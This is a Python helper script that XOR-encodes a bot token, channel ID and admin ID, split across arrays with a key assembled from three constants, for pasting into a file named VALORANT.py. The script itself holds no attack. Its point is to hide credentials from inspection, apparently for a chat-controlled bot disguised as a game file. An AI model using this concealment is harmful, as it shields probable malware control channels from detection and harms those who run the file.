"""
Generate XOR-obfuscated configuration for opss-terconnect.

Usage:
    python token_gen.py <bot_token> <channel_id> <admin_id>

Output:
    Paste the generated byte arrays and RUNTIME_KEY into VALORANT.py.
    The token is split across multiple arrays and the decode key is derived
    at runtime from separate constants (not a single literal).
"""

import sys


def _split_token(token: str, num_parts: int = 3) -> list:
    """Split token into num_parts parts of roughly equal size."""
    encoded = token.encode("utf-8")
    total = len(encoded)
    parts = []
    chunk_size = total // num_parts
    remainder = total % num_parts

    start = 0
    for i in range(num_parts):
        end = start + chunk_size + (1 if i < remainder else 0)
        parts.append(list(encoded[start:end]))
        start = end

    return parts


def _xor_encode(data: list, key: int) -> list:
    """XOR-encode a list of byte values with the given key."""
    return [b ^ key for b in data]


def main():
    if len(sys.argv) != 4:
        print(f"Usage: {sys.argv[0]} <bot_token> <channel_id> <admin_id>")
        sys.exit(1)

    token = sys.argv[1]
    channel_id = sys.argv[2]
    admin_id = sys.argv[3]

    # Split token into 3 parts
    token_parts = _split_token(token, num_parts=3)

    channel_bytes = list(channel_id.encode("utf-8"))
    admin_bytes = list(admin_id.encode("utf-8"))

    # Runtime key: combine 3 constants at runtime.
    # None alone is the key. Finding one misses it — you need all three.
    RUNTIME_KEY_A = 0x42
    RUNTIME_KEY_B = 0x57
    RUNTIME_KEY_C = 0x19
    _COMPUTED_KEY = RUNTIME_KEY_A ^ RUNTIME_KEY_B ^ RUNTIME_KEY_C

    token_parts_xored = [_xor_encode(part, _COMPUTED_KEY) for part in token_parts]
    channel_xored = _xor_encode(channel_bytes, _COMPUTED_KEY)
    admin_xored = _xor_encode(admin_bytes, _COMPUTED_KEY)

    print("# === PASTE INTO VALORANT.py ===")
    print()
    print("# --- Runtime key (split, combined at runtime) ---")
    print(f"RUNTIME_KEY_A = 0x{RUNTIME_KEY_A:02X}")
    print(f"RUNTIME_KEY_B = 0x{RUNTIME_KEY_B:02X}")
    print(f"RUNTIME_KEY_C = 0x{RUNTIME_KEY_C:02X}")
    print()
    print("# --- Token parts (XOR-obfuscated, split into 3 arrays) ---")
    for i, part in enumerate(token_parts_xored, 1):
        print(f"_TOKEN_PART_{i}_XORED = [")
        for j, b in enumerate(part):
            comma = "," if j < len(part) - 1 else ""
            print(f"    0x{b:02X}{comma}")
        print("]")
        print()
    print("# --- Channel ID (XOR-obfuscated) ---")
    print("_CHANNEL_XORED = [")
    for j, b in enumerate(channel_xored):
        comma = "," if j < len(channel_xored) - 1 else ""
        print(f"    0x{b:02X}{comma}")
    print("]")
    print()
    print("# --- Admin ID (XOR-obfuscated) ---")
    print("_ADMIN_XORED = [")
    for j, b in enumerate(admin_xored):
        comma = "," if j < len(admin_xored) - 1 else ""
        print(f"    0x{b:02X}{comma}")
    print("]")


if __name__ == "__main__":
    main()
